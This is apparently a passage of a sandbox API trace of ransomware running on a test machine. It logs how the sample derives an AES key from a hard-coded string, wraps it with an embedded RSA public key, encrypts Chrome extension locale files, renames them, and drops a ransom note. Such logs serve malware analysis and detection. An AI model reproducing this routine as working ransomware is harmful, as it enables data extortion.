returned 1 [0255.458] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.458] CryptHashData (hHash=0x2e18828, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.458] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.458] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.458] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.458] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11f80) returned 1 [0255.459] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11f80, dwCertEncodingType=0x1, pInfo=0x2e2a170*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a1a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a1a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18ba8) returned 1 [0255.459] CryptEncrypt (in: hKey=0x2e18ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.459] CryptEncrypt (in: hKey=0x2e18ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e111b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e111b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.459] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e111b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e111b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.460] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xbb, lpOverlapped=0x0) returned 1 [0255.462] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xbb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0255.462] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0255.462] CloseHandle (hObject=0x5d60) returned 1 [0255.462] CloseHandle (hObject=0x5d5c) returned 1 [0255.462] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0255.467] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0255.467] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0255.469] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0255.472] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.472] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.472] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.472] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.472] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.472] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0255.472] AreFileApisANSI () returned 1 [0255.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0255.472] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.473] GetFileType (hFile=0x5d50) returned 0x1 [0255.473] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.475] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.475] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.475] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.475] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.475] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.475] GetLastError () returned 0x0 [0255.475] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0255.476] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0255.476] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.477] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.478] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.478] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.481] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.481] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.481] CryptHashData (hHash=0x2e18128, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.481] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18828) returned 1 [0255.481] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.481] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.481] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11700) returned 1 [0255.482] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11700, dwCertEncodingType=0x1, pInfo=0x2e29f00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29f30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29f38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18de8) returned 1 [0255.482] CryptEncrypt (in: hKey=0x2e18de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.482] CryptEncrypt (in: hKey=0x2e18de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11cd8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11cd8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.482] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e11cd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11cd8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.484] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xc6, lpOverlapped=0x0) returned 1 [0255.485] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0255.485] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0255.485] CloseHandle (hObject=0x5d5c) returned 1 [0255.485] CloseHandle (hObject=0x5d60) returned 1 [0255.485] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0255.489] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0255.489] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0255.491] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0255.492] CryptDestroyHash (hHash=0x2e18128) returned 1 [0255.492] CryptDestroyKey (hKey=0x2e18828) returned 1 [0255.492] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.492] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.492] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.492] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0255.493] AreFileApisANSI () returned 1 [0255.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0255.493] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.494] GetFileType (hFile=0x5d50) returned 0x1 [0255.494] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.495] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.495] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.496] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.497] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.497] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.497] GetLastError () returned 0x0 [0255.497] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json")) returned 0x20 [0255.497] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0255.498] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.499] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.500] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.501] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.503] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.503] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.503] CryptHashData (hHash=0x2e18828, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.503] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.504] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.504] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.504] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11920) returned 1 [0255.504] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11920, dwCertEncodingType=0x1, pInfo=0x2e2a650*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a680*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a688*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18e68) returned 1 [0255.505] CryptEncrypt (in: hKey=0x2e18e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.505] CryptEncrypt (in: hKey=0x2e18e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e114e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e114e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.506] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e114e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e114e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.507] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xaf, lpOverlapped=0x0) returned 1 [0255.509] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xaf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0255.509] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, 